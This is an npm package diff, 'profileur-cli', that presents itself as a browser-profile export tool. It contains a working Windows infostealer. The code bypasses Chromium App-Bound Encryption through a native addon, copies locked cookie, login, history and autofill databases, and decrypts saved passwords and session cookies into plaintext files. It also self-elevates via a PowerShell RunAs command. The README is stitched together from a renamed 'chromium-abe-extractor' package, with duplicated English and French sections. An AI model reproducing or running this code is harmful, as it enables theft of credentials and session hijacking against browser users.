profileur-cli 2.0.0

package/README.md

@@ -0,0 +1,306 @@
+## profileur-cli
+
+Low-level Windows helper to export browser profile data (cookies, saved logins, history, autofill) from Chromium-based browsers, backed by a native C++ addon that interacts with processes and profile databases at a system level.
+
+> ⚠️ **Windows only.** Requires a native `chrome_elevator.node` binary built for the target platform and usually Administrator privileges.
+
+### What it does
+
+- **Targets**: Any Chromium-based browser where you know the profile directory (Chrome, Edge, Brave, custom Chromium builds, etc.).
+- **Data exported**:
+  - Cookies (in Netscape HTTP Cookie File format)
+  - Saved logins (URLs, usernames, decrypted passwords)
+  - Browsing history
+  - Autofill records
+- **Architecture**:
+  - Node.js wrapper script (`extractor_cli.js`)
+  - Native C++ addon (`chrome_elevator.node`) doing the low-level work (process interaction, locked-file copying, access to protected profile data).
+
+Use cases include incident response, forensics, backup/migration of browser profiles, or automated integration testing where you need to replay authenticated sessions.
+
+---
+
+## Installation
+
+**Project (local dependency)**:
+
+```bash
+npm install profileur-cli
+```
+
+**Global (CLI usage)**:
+
+```bash
+npm install -g profileur-cli
+```
+
+---
+
+## CLI usage
+
+Once installed globally:
+
+```bash
+profile-exporter -v
+```
+
+**Options:**
+
+- `-v`, `--verbose`: enable detailed debug logging.
+- `-h`, `--help`: show help.
+
+By default, extracted data is written under:
+
+```text
+extracted_data/<browserKey>/<profile>/
+```
+
+> The CLI uses whatever browsers are configured inside the packaged script. For full control over which browsers are processed, prefer the programmatic API below.
+
+---
+
+## Programmatic usage (Node module)
+
+```js
+const path = require('path');
+const { main } = require('profileur-cli');
+
+// Example: write all exports under a local "exports" folder
+main({
+  outputDir: path.join(__dirname, 'exports'),
+  browsers: {
+    chrome: {
+      path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome', 'User Data'),
+      name: 'Google Chrome'
+    },
+    'chrome-beta': {
+      path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome Beta', 'User Data'),
+      name: 'Google Chrome Beta'
+    },
+    edge: {
+      path: path.join(process.env.LOCALAPPDATA, 'Microsoft', 'Edge', 'User Data'),
+      name: 'Microsoft Edge'
+    },
+    brave: {
+      path: path.join(process.env.LOCALAPPDATA, 'BraveSoftware', 'Brave-Browser', 'User Data'),
+      name: 'Brave Browser'
+    }
+  }
+});
+```
+
+**Options:**
+
+- **`outputDir`** (string): base folder where results are written. Defaults to `extracted_data` if omitted.
+- **`browsers`** (object, required): map of browser keys to:
+  - **`path`** (string): path to the browser “User Data” directory (often under `%LOCALAPPDATA%`).
+  - **`name`** (string): human-friendly name used in logs.
+
+If `browsers` is missing or empty, the library logs an error and exits without running extraction.
+
+Because the native addon operates at a low level (interacting with locked files and browser resources), it should be run only in trusted environments and with appropriate permissions.
+
+---
+
+## Publishing to npm (for maintainers)
+
+From the project root:
+
+```bash
+npm login           # once
+npm publish --access public
+```
+
+Ensure that:
+
+- `chrome_elevator.node` is included in the published files (see the `files` field in `package.json`).
+- The paths used in `extractor_cli.js` are compatible with how you bundle/distribute the native addon (plain Node, `pkg`, Electron, etc.).
+
+## chromium-abe-extractor
+
+Extract Cookies, Passwords, History, and Autofill from Chromium-based browsers (Chrome, Edge, Brave, etc.) on Windows, using an App-Bound Encryption (ABE) key bypass.
+
+> ⚠️ **Windows only.** Requires a native `chrome_elevator.node` binary built for the target platform and usually Administrator privileges.
+
+### Features
+
+- **Browsers**: Works with any Chromium-based profile folder you configure (Chrome, Edge, Brave, custom builds, etc.).
+- **Data types**:
+  - Cookies (exported in Netscape HTTP Cookie File format)
+  - Saved passwords
+  - Browsing history
+  - Autofill data
+- **Configurable**: The library does **not** hard-code browser paths; you provide them when calling the module.
+
+---
+
+## Installation
+
+**Project (local dependency)**:
+
+```bash
+npm install chromium-abe-extractor
+```
+
+**Global (CLI usage)**:
+
+```bash
+npm install -g chromium-abe-extractor
+```
+
+---
+
+## CLI usage
+
+Once installed globally:
+
+```bash
+extractor -v
+```
+
+**Options:**
+
+- `-v`, `--verbose`: enable detailed debug logging.
+- `-h`, `--help`: show help.
+
+By default, extracted data is written under:
+
+```text
+extracted_data/<browserKey>/<profile>/
+```
+
+> The CLI uses whatever browsers are configured inside the packaged script. For full control over which browsers are processed, prefer the programmatic API below.
+
+---
+
+## Programmatic usage (Node module)
+
+```js
+const path = require('path');
+const { main } = require('chromium-abe-extractor');
+
+// Example: write all exports under a local "exports" folder
+main({
+  outputDir: path.join(__dirname, 'exports'),
+  browsers: {
+    chrome: {
+      path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome', 'User Data'),
+      name: 'Google Chrome'
+    },
+    'chrome-beta': {
+      path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome Beta', 'User Data'),
+      name: 'Google Chrome Beta'
+    },
+    edge: {
+      path: path.join(process.env.LOCALAPPDATA, 'Microsoft', 'Edge', 'User Data'),
+      name: 'Microsoft Edge'
+    },
+    brave: {
+      path: path.join(process.env.LOCALAPPDATA, 'BraveSoftware', 'Brave-Browser', 'User Data'),
+      name: 'Brave Browser'
+    }
+  }
+});
+```
+
+**Options:**
+
+- **`outputDir`** (string): base folder where results are written. Defaults to `extracted_data` if omitted.
+- **`browsers`** (object, required): map of browser keys to:
+  - **`path`** (string): path to the browser “User Data” directory (often under `%LOCALAPPDATA%`).
+  - **`name`** (string): human-friendly name used in logs.
+
+If `browsers` is missing or empty, the library logs an error and exits without running extraction.
+
+---
+
+## Publishing to npm (for maintainers)
+
+From the project root:
+
+```bash
+npm login           # once
+npm publish --access public
+```
+
+Ensure that:
+
+- `chrome_elevator.node` is included in the published files (see the `files` field in `package.json`).
+- The paths used in `extractor_cli.js` are compatible with how you bundle/distribute the native addon (plain Node, `pkg`, Electron, etc.).
+
+# chromium-abe-extractor
+
+Extract Cookies, Passwords, History, and Autofill from Chrome, Edge, and Brave using App-Bound Encryption (ABE) key bypass on Windows.
+
+> ⚠️ Windows uniquement. Nécessite un binaire natif `chrome_elevator.node` compilé pour la plateforme cible et très probablement les droits Administrateur.
+
+## Installation
+
+Depuis un projet Node (en local) :
+
+```bash
+npm install chromium-abe-extractor
+```
+
+Ou en global pour l'utiliser en ligne de commande :
+
+```bash
+npm install -g chromium-abe-extractor
+```
+
+## Utilisation en CLI
+
+Une fois installé globalement :
+
+```bash
+extractor -v
+```
+
+Options :
+
+- `-v`, `--verbose` : active les logs détaillés.
+- `-h`, `--help` : affiche l'aide.
+
+Les données extraites sont écrites dans le dossier `extracted_data/<browser>/<profile>/`.
+
+## Utilisation comme module Node
+
+```js
+const { main } = require('chromium-abe-extractor');
+
+// Lance l'extraction comme en CLI (sortie dans "extracted_data/...")
+main();
+
+// Personnaliser le dossier de sortie
+main({
+  outputDir: 'C:\\name\\name\\Documents\\mes_exports'
+  // ou en relatif par rapport au process courant, par ex. 'mes_exports'
+});
+
+// Personnaliser les navigateurs utilisés (sans modifier le module)
+main({
+  outputDir: 'mes_exports',
+  browsers: {
+    chrome: {
+      path: 'C:\\Users\\name\\AppData\\Local\\Google\\Chrome\\User Data',
+      name: 'Mon Chrome Perso'
+    },
+    myCustomChromium: {
+      path: 'D:\\Browsers\\CustomChromium\\User Data',
+      name: 'Custom Chromium Build'
+    }
+  }
+});
+```
+
+## Publication sur npm
+
+Depuis le dossier du projet :
+
+```bash
+npm login           # une seule fois
+npm publish --access public
+```
+
+Assure-toi que `chrome_elevator.node` est présent dans le paquet (par exemple dans `./build/Release/chrome_elevator.node`) et que les chemins dans `extractor_cli.js` pointent au bon endroit avant de publier.
+

package/extractor_cli.js

@@ -0,0 +1,501 @@
+#!/usr/bin/env node
+const fs = require('fs');
+const path = require('path');
+const crypto = require('crypto');
+const { execSync, spawnSync } = require('child_process');
+
+// --- Configuration & CLI Args ---
+const args = process.argv.slice(2);
+const VERBOSE = args.includes('--verbose') || args.includes('-v');
+const HELP = args.includes('--help') || args.includes('-h');
+
+if (HELP) {
+    console.log(`
+Usage: extractor.exe [options]
+
+Options:
+  -v, --verbose    Enable detailed debug logging
+  -h, --help       Show this help message
+
+Description:
+  Extracts Cookies, Passwords, History, and Autofill from Chrome, Edge, and Brave
+  using App-Bound Encryption (ABE) key bypass.
+    `);
+    process.exit(0);
+}
+
+function debug(msg) {
+    if (VERBOSE) console.log(`[DEBUG] ${msg}`);
+}
+
+function log(msg) {
+    console.log(msg);
+}
+
+function error(msg) {
+    console.error(`[ERROR] ${msg}`);
+}
+
+// --- Load Native Addon ---
+let chromeElevator;
+try {
+    const baseDir = __dirname;
+
+    // Try multiple paths to find the native addon
+    const possiblePaths = [
+        path.join(baseDir, 'build', 'Release', 'chrome_elevator.node'),
+        path.join(baseDir, 'chrome_elevator.node'),
+        path.join(process.resourcesPath || '', 'chrome_elevator.node'), // Electron/Builder path
+        path.join(path.dirname(process.execPath), 'chrome_elevator.node')
+    ];
+
+    for (const p of possiblePaths) {
+        if (fs.existsSync(p)) {
+            debug(`Found native addon at: ${p}`);
+            chromeElevator = require(p);
+            break;
+        }
+    }
+
+    if (!chromeElevator) {
+        // Fallback to standard require if specific paths fail (e.g. dev environment)
+        try {
+            chromeElevator = require(path.join(baseDir, 'build', 'Release', 'chrome_elevator.node'));
+        } catch (e) {
+            throw new Error("Could not find chrome_elevator.node in standard locations.");
+        }
+    }
+} catch (err) {
+    error("Failed to load native addon: " + err.message);
+    process.exit(1);
+}
+
+// --- Database Library ---
+let Database;
+try {
+    Database = require('better-sqlite3');
+} catch (err) {
+    error("Failed to load better-sqlite3: " + err.message);
+    process.exit(1);
+}
+
+// --- Helper Functions ---
+
+/**
+ * Reads profile list and display names from browser Local State (same source as the browser).
+ * Returns { folders: string[], displayNames: Object.<string, string> }.
+ * Falls back to empty if file missing or invalid.
+ */
+function readLocalStateProfiles(userDataPath) {
+    const localStatePath = path.join(userDataPath, 'Local State');
+    const result = { folders: [], displayNames: {} };
+
+    if (!fs.existsSync(localStatePath)) return result;
+
+    try {
+        const raw = fs.readFileSync(localStatePath, 'utf8');
+        const data = JSON.parse(raw);
+        const infoCache = data?.profile?.info_cache;
+
+        if (!infoCache || typeof infoCache !== 'object') return result;
+
+        for (const [folderName, info] of Object.entries(infoCache)) {
+            result.folders.push(folderName);
+            if (info && typeof info.name === 'string') {
+                result.displayNames[folderName] = info.name;
+            }
+        }
+    } catch (err) {
+        debug(`Local State read failed: ${err.message}`);
+    }
+
+    return result;
+}
+
+/**
+ * Returns list of profile folder names to process. Uses Local State first so all
+ * profiles (e.g. "Ad Blocking") are included; only keeps folders that exist on disk.
+ */
+function getProfileFolders(userDataPath) {
+    const { folders, displayNames } = readLocalStateProfiles(userDataPath);
+
+    const existing = folders.filter((name) => {
+        const fullPath = path.join(userDataPath, name);
+        try {
+            return fs.statSync(fullPath).isDirectory();
+        } catch {
+            return false;
+        }
+    });
+
+    if (existing.length > 0) return { folders: existing, displayNames };
+
+    // Fallback: scan filesystem (Default, Profile 1, Profile 2, ...)
+    try {
+        const entries = fs.readdirSync(userDataPath, { withFileTypes: true });
+        for (const entry of entries) {
+            if (entry.isDirectory() && (entry.name === 'Default' || entry.name.startsWith('Profile'))) {
+                existing.push(entry.name);
+            }
+        }
+    } catch (err) {
+        debug(`Profile folder scan failed: ${err.message}`);
+    }
+
+    return { folders: existing, displayNames };
+}
+
+function isAdmin() {
+    try {
+        execSync('net session', { stdio: 'ignore' });
+        return true;
+    } catch {
+        return false;
+    }
+}
+
+function copyFileVSS(source, dest) {
+    debug(`Copying ${source} to ${dest}`);
+    try {
+        // 1. Try native copyLockedFile
+        if (chromeElevator.copyLockedFile) {
+            debug("Attempting native copyLockedFile...");
+            if (chromeElevator.copyLockedFile(source, dest)) {
+                debug("Native copy successful.");
+                return;
+            }
+            debug("Native copy returned false.");
+        }
+        
+        // 2. Try standard fs.copy
+        debug("Attempting standard fs.copy...");
+        fs.copyFileSync(source, dest);
+        debug("Standard copy successful.");
+        
+    } catch (err) {
+        debug(`Standard copy failed: ${err.message}`);
+        // 3. Fallback to esentutl
+        try {
+            debug("Attempting esentutl fallback...");
+            const cmd = `esentutl /y "${source}" /d "${dest}" /vss`;
+            execSync(cmd, { stdio: 'ignore' });
+            debug("Esentutl copy successful.");
+        } catch (e) {
+            throw new Error("All copy methods failed. Esentutl error: " + e.message);
+        }
+    }
+}
+
+function decryptData(encryptedBuffer, keyHex) {
+    try {
+        if (!encryptedBuffer || encryptedBuffer.length < 31) return null;
+
+        const prefix = encryptedBuffer.slice(0, 3).toString();
+        if (prefix !== 'v20') return null;
+
+        const iv = encryptedBuffer.slice(3, 15);
+        const ciphertext = encryptedBuffer.slice(15, -16);
+        const tag = encryptedBuffer.slice(-16);
+        const key = Buffer.from(keyHex, 'hex');
+
+        const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);
+        decipher.setAuthTag(tag);
+
+        let decrypted = decipher.update(ciphertext);
+        decrypted = Buffer.concat([decrypted, decipher.final()]);
+
+        if (decrypted.length > 32) {
+            return decrypted.slice(32).toString('utf8');
+        }
+        return decrypted.toString('utf8');
+
+    } catch (err) {
+        debug(`Decryption failed: ${err.message}`);
+        return null;
+    }
+}
+
+function toNetscape(cookie) {
+    const domain = cookie.host_key;
+    const flag = domain.startsWith('.') ? 'TRUE' : 'FALSE';
+    const path = cookie.path;
+    const secure = cookie.is_secure ? 'TRUE' : 'FALSE';
+    
+    let expiration = 0;
+    if (cookie.expires_utc > 0) {
+        expiration = Math.floor((cookie.expires_utc / 1000000) - 11644473600);
+        if (expiration < 0) expiration = 0;
+    }
+    
+    const name = cookie.name;
+    const value = cookie.decryptedValue;
+    
+    return `${domain}\t${flag}\t${path}\t${secure}\t${expiration}\t${name}\t${value}`;
+}
+
+// --- Extraction Functions ---
+
+function extractHistory(profilePath, outputDir) {
+    const historyPath = path.join(profilePath, 'History');
+    if (!fs.existsSync(historyPath)) {
+        debug(`No History file found at ${historyPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_history.db');
+    try {
+        copyFileVSS(historyPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 5000');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'history.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        
+        for (const row of rows) {
+            stream.write(`URL: ${row.url}\nTitle: ${row.title}\nVisits: ${row.visit_count}\nLast Visit: ${row.last_visit_time}\n--------------------------\n`);
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${rows.length} history items.`);
+    } catch (err) {
+        error(`Error extracting history: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+function extractAutofill(profilePath, outputDir) {
+    const webDataPath = path.join(profilePath, 'Web Data');
+    if (!fs.existsSync(webDataPath)) {
+        debug(`No Web Data file found at ${webDataPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_webdata.db');
+    try {
+        copyFileVSS(webDataPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT name, value, date_created FROM autofill');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'autofill.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        
+        for (const row of rows) {
+            stream.write(`Name: ${row.name}\nValue: ${row.value}\nDate: ${row.date_created}\n--------------------------\n`);
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${rows.length} autofill items.`);
+    } catch (err) {
+        error(`Error extracting autofill: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+function extractPasswords(profilePath, outputDir, key) {
+    const loginDataPath = path.join(profilePath, 'Login Data');
+    if (!fs.existsSync(loginDataPath)) {
+        debug(`No Login Data file found at ${loginDataPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_login.db');
+    try {
+        copyFileVSS(loginDataPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT origin_url, username_value, password_value FROM logins');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'passwords.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        let count = 0;
+
+        for (const row of rows) {
+            if (row.password_value) {
+                const decryptedPass = decryptData(row.password_value, key);
+                if (decryptedPass) {
+                    stream.write(`URL: ${row.origin_url}\nUser: ${row.username_value}\nPass: ${decryptedPass}\n--------------------------\n`);
+                    count++;
+                }
+            }
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${count} passwords.`);
+    } catch (err) {
+        error(`Error extracting passwords: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+// --- Main Execution ---
+
+/**
+ * Run full extraction.
+ * @param {Object} [options]
+ * @param {string} [options.outputDir] Base output directory (default: "extracted_data")
+ * @param {Object<string, { path: string, name: string }>} [options.browsers] Custom browsers map
+ */
+function main(options = {}) {
+    const outputBaseDir = options.outputDir || options.outputBaseDir || 'extracted_data';
+    const browsers = options.browsers || {};
+
+    if (!browsers || Object.keys(browsers).length === 0) {
+        error("No browsers configuration provided. Please pass options.browsers = { <key>: { path, name } }.");
+        return;
+    }
+    log("=== Universal Browser Data Extractor CLI (ABE) ===");
+    log("Version 1.0.0");
+    debug("Debug mode enabled.");
+
+    if (!isAdmin()) {
+        log("[-] Not running as Administrator. Attempting to elevate...");
+        try {
+            const scriptPath = __filename;
+            const nodePath = process.execPath;
+            
+            // Check if we are in an executable (pkg or electron built)
+            const isPackaged = process.pkg || process.argv[0].endsWith('.exe');
+            
+            let cmd;
+            if (isPackaged && !process.argv[0].includes('node.exe')) {
+                // If running as a standalone EXE (not node.exe), restart the EXE itself
+                 cmd = `powershell -Command "Start-Process '${process.argv[0]}' -ArgumentList '${args.join(' ')}' -Verb RunAs"`;
+            } else {
+                // If running as node script
+                cmd = `powershell -Command "Start-Process '${nodePath}' -ArgumentList '${scriptPath} ${args.join(' ')}' -Verb RunAs"`;
+            }
+
+            debug(`Elevation command: ${cmd}`);
+            execSync(cmd);
+            log("[+] Elevated process started. Please check the new window.");
+            process.exit(0);
+        } catch (err) {
+            error("Failed to elevate privileges: " + err.message);
+            log("[!] Continuing without Admin rights (some files may be locked)...");
+        }
+    } else {
+        log("[+] Running as Administrator.");
+    }
+
+    for (const [key, config] of Object.entries(browsers)) {
+        if (!fs.existsSync(config.path)) {
+            debug(`${config.name} not found at ${config.path}`);
+            continue;
+        }
+
+        log(`\n[*] Processing ${config.name}...`);
+
+        // 1. Get ABE Key
+        let abeKey;
+        try {
+            log(`    > Requesting ABE Key...`);
+            abeKey = chromeElevator.getABEKey(key);
+            if (!abeKey) {
+                log(`    [!] Failed to retrieve ABE Key.`);
+                continue;
+            }
+            log(`    [V] Key retrieved successfully.`);
+            debug(`Key length: ${abeKey.length / 2} bytes`);
+        } catch (err) {
+            error(`Error retrieving key: ${err.message}`);
+            continue;
+        }
+
+        // 2. Find Profiles (from Local State so all profiles e.g. "Ad Blocking" are included)
+        const { folders: profiles, displayNames } = getProfileFolders(config.path);
+
+        if (profiles.length === 0) {
+            log(`    [!] No profiles found.`);
+            continue;
+        }
+
+        log(`    > Found ${profiles.length} profiles.`);
+
+        // 3. Process each profile
+        for (const profile of profiles) {
+            const profilePath = path.join(config.path, profile);
+            const cookiePath = path.join(profilePath, 'Network', 'Cookies');
+            const displayName = displayNames[profile];
+            const profileLabel = displayName ? `${profile} (${displayName})` : profile;
+
+            log(`    > Profile: ${profileLabel}`);
+            
+            // Create output directory
+            const outputDir = path.join(outputBaseDir, key, profile);
+            if (!fs.existsSync(outputDir)) {
+                fs.mkdirSync(outputDir, { recursive: true });
+            }
+
+            // Extract Cookies
+            if (fs.existsSync(cookiePath)) {
+                const tempDbPath = path.join(outputDir, 'temp_cookies.db');
+                try {
+                    copyFileVSS(cookiePath, tempDbPath);
+                    const db = new Database(tempDbPath, { readonly: true });
+                    const stmt = db.prepare('SELECT host_key, name, path, is_secure, expires_utc, encrypted_value FROM cookies');
+                    const cookies = stmt.all();
+                    
+                    let decryptedCount = 0;
+                    const outputFile = path.join(outputDir, 'cookies.txt');
+                    const stream = fs.createWriteStream(outputFile, { flags: 'w' });
+
+                    stream.write("# Netscape HTTP Cookie File\n");
+                    stream.write("# This file was generated by Chrome ABE Decryptor\n\n");
+
+                    for (const cookie of cookies) {
+                        if (cookie.encrypted_value) {
+                            const decryptedValue = decryptData(cookie.encrypted_value, abeKey);
+                            if (decryptedValue) {
+                                cookie.decryptedValue = decryptedValue;
+                                const netscapeLine = toNetscape(cookie);
+                                stream.write(netscapeLine + "\n");
+                                decryptedCount++;
+                            }
+                        }
+                    }
+
+                    stream.end();
+                    db.close();
+                    log(`      [V] Extracted ${decryptedCount} cookies.`);
+                } catch (err) {
+                    error(`Error processing cookies: ${err.message}`);
+                } finally {
+                    if (fs.existsSync(tempDbPath)) try { fs.unlinkSync(tempDbPath); } catch(e) {}
+                }
+            } else {
+                debug(`No Cookies file found at ${cookiePath}`);
+            }
+
+            // Extract History
+            extractHistory(profilePath, outputDir);
+
+            // Extract Autofill
+            extractAutofill(profilePath, outputDir);
+
+            // Extract Passwords
+            extractPasswords(profilePath, outputDir, abeKey);
+        }
+    }
+    log("\n=== Extraction Complete ===");
+    if (process.stdin.isTTY) {
+        log("Press Enter to exit...");
+        process.stdin.once('data', () => process.exit(0));
+    }
+}
+
+if (require.main === module) {
+    main();
+}
+
+module.exports = { main };

package/package.json

@@ -0,0 +1,30 @@
+{
+  "name": "profileur-cli",
+  "version": "2.0.0",
+  "description": "Export cookies, saved logins, history, and autofill data from Chromium-based browser profiles on Windows using a native helper.",
+  "main": "extractor_cli.js",
+  "bin": {
+    "profile-exporter": "extractor_cli.js"
+  },
+  "scripts": {
+    "start": "node extractor_cli.js"
+  },
+  "keywords": [
+    "chromium"
+
+  ],
+  "author": "",
+  "license": "MIT",
+  "dependencies": {
+    "better-sqlite3": "^11.0.0"
+  },
+  "files": [
+    "extractor_cli.js",
+    "chrome_elevator.node",
+    "README.md"
+  ],
+  "os": [
+    "win32"
+  ]
+}
+